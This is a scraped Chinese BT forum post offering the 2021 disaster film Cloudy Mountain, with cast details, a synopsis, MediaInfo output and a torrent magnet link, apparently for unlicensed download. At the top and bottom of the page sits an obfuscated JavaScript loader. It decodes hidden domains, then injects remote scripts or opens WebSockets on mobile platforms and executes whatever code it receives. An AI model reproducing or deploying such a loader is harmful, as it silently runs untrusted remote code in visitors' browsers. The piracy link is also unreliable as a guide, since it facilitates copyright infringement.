峰爆[国语配音/中文字幕].Cloudy.Mountain.2021.2160p.WEB-DL.H265.DDP5.1 2.95GB

版主小s 1月前 298

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 峰爆 / 无限救援 / 无限深度 / Cloudy Mountain / Infinite Depth

◎年 代 2021

◎产 地 中国大陆

◎类 别 剧情 / 动作 / 灾难

◎语 言 汉语普通话

◎上映日期 2021-09-17(中国大陆)

◎IMDb链接 https://www.imdb.com/title/tt15413054/

◎豆瓣评分 6.3/10 (110289人评价)

◎豆瓣链接 https://movie.douban.com/subject/35231370/

◎片 长 114分钟

◎导 演 李骏 Jun Li (id:1320190)

◎编 剧 沙颂 Song Sha (id:1327765)

李骏 Jun Li (id:1320190)

◎演 员 朱一龙 Yilong Zhu (id:1318883)

黄志忠 Zhizhong Huang (id:1255860)

陈数 Shu Chen (id:1274346)

焦俊艳 Junyan Jiao (id:1312818)

成泰燊 Taishen Cheng (id:1196361)

王戈 Ge Wang (id:1375802)

卢思宇 Siyu Lu (id:1435098)

洪剑涛 Jiantao Hong (id:1274654)

周晓鸥 Xiaoou Zhou (id:1316334)

斌子 Zi Bin (id:1322802)

孙一理 Yi-li Sun (id:1316040)

黄超 Chao Huang (id:1422009)

闫鹏 Peng Yan (id:1433697)

张国立 Guoli Zhang (id:1015115)

张译 Yi Zhang (id:1274761)

白客 White. K (id:1332932)

乔欣 Xin Qiao (id:1351423)

李光洁 Guangjie Li (id:1275178)

乔振宇 Zhenyu Qiao (id:1275683)

章申 Shen Zhang (id:1314409)

于莎莎 Shasha Yu (id:1327598)

陶虹 Hong Tao (id:1015199)

陈卓 Zhuo Chen (id:1460651)

赵晓时 Xiaoshi Zhao (id:1310556)

焦宏奋 Hongfen Jiao (id:1412277)

傅若清 Ruoqing Fu (id:1417588)

许建海 Jianhai Xu (id:1384186)

崔陆萌 Lumeng Cui (id:1349292)

陈洁 Jie Chen (id:1449063)

杨东 Dong Yang (id:1403121)

郭思达 Sida Guo (id:1392594)

张杰 Jie Zhang (id:1274727)

赵晓时 Xiaoshi Zhao (id:1310556)

罗礼贤 Bruce Law (id:1289542)

罗义民 Norman Law (id:1316462)

张冀 Ji Zhang (id:1327606)

陶虹 Hong Tao (id:1015199)

◎标 签 灾难 / 救援 / 中国铁建 / 中国大陆 / 动作 / 2021 / 剧情 / 献礼片

◎简 介

一座修建十年的隧道即将竣工之际,受全球地质变动影响,地裂、地震、山体滑坡、泥石流等一系列地质灾害呼啸而至,隧道与整个县城危在旦夕,“老洪”洪赟兵(黄志忠 饰)、“小洪”洪翼舟(朱一龙 饰)父子俩于绝境处挺身而出,他们如何与16万人度过这场生死危机?

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 285192516109381842227391123185686758028 (0xD68E14A6B991AF6DDB769AA31F33428C)

  4. Complete name : 峰爆[email protected]mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 2.95 GiB

  8. Duration : 1 h 54 min

  9. Overall bit rate : 3 695 kb/s

  10. Encoded date : UTC 2021-10-29 09:11:12

  11. Writing application : mkvmerge v61.0.0 ('So') 64-bit

  12. Writing library : libebml v1.4.2 + libmatroska v1.6.4


  13. Video

  14. ID : 1

  15. Format : HEVC

  16. Format/Info : High Efficiency Video Coding

  17. Format profile : [email protected]@Main

  18. Codec ID : V_MPEGH/ISO/HEVC

  19. Duration : 1 h 54 min

  20. Bit rate : 3 247 kb/s

  21. Width : 3 840 pixels

  22. Height : 1 920 pixels

  23. Display aspect ratio : 2.000

  24. Frame rate mode : Constant

  25. Frame rate : 24.000 FPS

  26. Color space : YUV

  27. Chroma subsampling : 4:2:0

  28. Bit depth : 8 bits

  29. Bits/(Pixel*Frame) : 0.018

  30. Stream size : 2.60 GiB (88%)

  31. Default : Yes

  32. Forced : No


  33. Audio #1

  34. ID : 2

  35. Format : E-AC-3

  36. Format/Info : Enhanced AC-3

  37. Commercial name : Dolby Digital Plus

  38. Codec ID : A_EAC3

  39. Duration : 1 h 54 min

  40. Bit rate mode : Constant

  41. Bit rate : 256 kb/s

  42. Channel(s) : 6 channels

  43. Channel layout : L R C LFE Ls Rs

  44. Sampling rate : 48.0 kHz

  45. Frame rate : 31.250 FPS (1536 SPF)

  46. Compression mode : Lossy

  47. Stream size : 209 MiB (7%)

  48. Language : Chinese

  49. Service kind : Complete Main

  50. Default : Yes

  51. Forced : No


  52. Audio #2

  53. ID : 3

  54. Format : AAC LC

  55. Format/Info : Advanced Audio Codec Low Complexity

  56. Codec ID : A_AAC-2

  57. Duration : 1 h 54 min

  58. Bit rate : 192 kb/s

  59. Channel(s) : 2 channels

  60. Channel layout : L R

  61. Sampling rate : 44.1 kHz

  62. Frame rate : 43.066 FPS (1024 SPF)

  63. Compression mode : Lossy

  64. Stream size : 155 MiB (5%)

  65. Language : Chinese

  66. Default : Yes

  67. Forced : No




复制代码


TAGS 动作 剧情 灾难

磁力链:
  • magnet:?xt=urn:btih:BEDF955ADD62F8CFB838A92217E86177C71100B6

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};